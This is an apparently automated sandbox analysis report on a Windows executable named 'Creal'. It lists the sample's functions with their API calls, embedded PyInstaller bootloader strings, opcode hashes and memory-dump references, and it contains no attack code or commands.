                                                                                                                                                                                                                                                        • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                                        • Instruction ID: 3b720f627c51ce67968b1a7da087867c6f71361342c80c3bd128b0f679f0a304
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46419011A3964244FA50EF66AB652BD1391AF997C4F804133ED0DC7BDAEE3CE525CB80

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
• Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                        • Opcode ID: 8c3d3767c92c3f25500c132f33d9ae5f36ceff73d91df2c2d10727b506476509
                                                                                                                                                                                                                                                        • Instruction ID: 268c282573fa5c687afce056b4cbdec0966b675da94471dd5496056e077a9830
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c3d3767c92c3f25500c132f33d9ae5f36ceff73d91df2c2d10727b506476509
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E51F722A2864241FA619F11AA413BE7690FF69794F444133ED4DC7BCAEF3CE425CB40

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF6D925F0AA,?,?,-00000018,00007FF6D925AD53,?,?,?,00007FF6D925AC4A,?,?,?,00007FF6D9255F3E), ref: 00007FF6D925EE8C
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6D925F0AA,?,?,-00000018,00007FF6D925AD53,?,?,?,00007FF6D925AC4A,?,?,?,00007FF6D9255F3E), ref: 00007FF6D925EE98
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
• Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                        • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                        • Instruction ID: 171a3e1c5694dc4e9508cc8447d0f7a4170881ef5584123bc21729e3034b797d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E641EF21B3AA0251FA55DF16AA0067D2295BF49BB0F88913BDD1DD7798EE3CE865C300

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF6D9243804), ref: 00007FF6D92436E1
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D9243804), ref: 00007FF6D92436EB
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9242C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9243706,?,00007FF6D9243804), ref: 00007FF6D9242C9E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9242C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9243706,?,00007FF6D9243804), ref: 00007FF6D9242D63
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9242C50: MessageBoxW.USER32 ref: 00007FF6D9242D99
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                        • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                        • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                        • Instruction ID: 7af964d9428004d4d5952aa804a10e16b7ad84caec0c6daa75e113e5628370d3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86213061B2864241FA21FF25EA153BE2250BFAC754F404237D69DC69D5EE2CE624CB40

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                                                        • Instruction ID: 7e340d9fd1579614a6df1175c9ce18073fb24c3a3d92866361ac2e5e7721bca4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CC1C722A2C68691FBE09F159A442BD7B50FF81B90F594133EA4E837D9DF7CE8658700

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 995526605-0
                                                                                                                                                                                                                                                        • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                                        • Instruction ID: f6b4f96d4b3b1fc2a8f24ac62092457c80de4ce11f261c031b44db1d610995a0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64214431A2C64242FB509F59F64423EA7A0FF957A0F500236EA6D87BE8DFBCD4558B40

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9248570: GetCurrentProcess.KERNEL32 ref: 00007FF6D9248590
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9248570: OpenProcessToken.ADVAPI32 ref: 00007FF6D92485A3
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9248570: GetTokenInformation.KERNELBASE ref: 00007FF6D92485C8
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9248570: GetLastError.KERNEL32 ref: 00007FF6D92485D2
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9248570: GetTokenInformation.KERNELBASE ref: 00007FF6D9248612
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9248570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6D924862E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9248570: CloseHandle.KERNEL32 ref: 00007FF6D9248646
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF6D9243C55), ref: 00007FF6D924916C
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF6D9243C55), ref: 00007FF6D9249175
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                        • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                        • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(00000000,?,00007FF6D924352C,?,00000000,00007FF6D9243F23), ref: 00007FF6D9247F32
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateDirectory
                                                                                                                                                                                                                                                        • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                        • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D925CF4B), ref: 00007FF6D925D07C
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D925CF4B), ref: 00007FF6D925D107
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 953036326-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4170891091-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2780335769-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3251591375-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2976181284-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D9255839), ref: 00007FF6D9255957
                                                                                                                                                                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D9255839), ref: 00007FF6D925596D
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1707611234-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,?,?,00007FF6D9262D22,?,?,?,00007FF6D9262D5F,?,?,00000000,00007FF6D9263225,?,?,?,00007FF6D9263157), ref: 00007FF6D925A95E
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6D9262D22,?,?,?,00007FF6D9262D5F,?,?,00000000,00007FF6D9263225,?,?,?,00007FF6D9263157), ref: 00007FF6D925A968
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,00007FF6D925A9D5,?,?,00000000,00007FF6D925AA8A), ref: 00007FF6D925ABC6
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6D925A9D5,?,?,00000000,00007FF6D925AA8A), ref: 00007FF6D925ABD0
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF6D9250C90,?,?,?,00007FF6D92522FA,?,?,?,?,?,00007FF6D9253AE9), ref: 00007FF6D925D63A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                        • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                        • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                        • Instruction ID: 67368dc6e4cfa4e6ac1a29894f0b3ce193d96c8a97206f6bc912c410d673ef24
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A902D824A2EB0BC0FA159F56AE1457C23A5BF18744F441137D82EC6AA0EF3CB579C780
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
• Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                                                                                                        • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                        • Instruction ID: e24f27fff603baf5603516c66a84f0443c3a115bbc2d977c42aed604b4cb0585
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1313E76618B8186FB609F60E8903EE73A4FB98748F44413ADA4E87B95DF38D558CB10
                                                                                                                                                                                                                                                        APIs
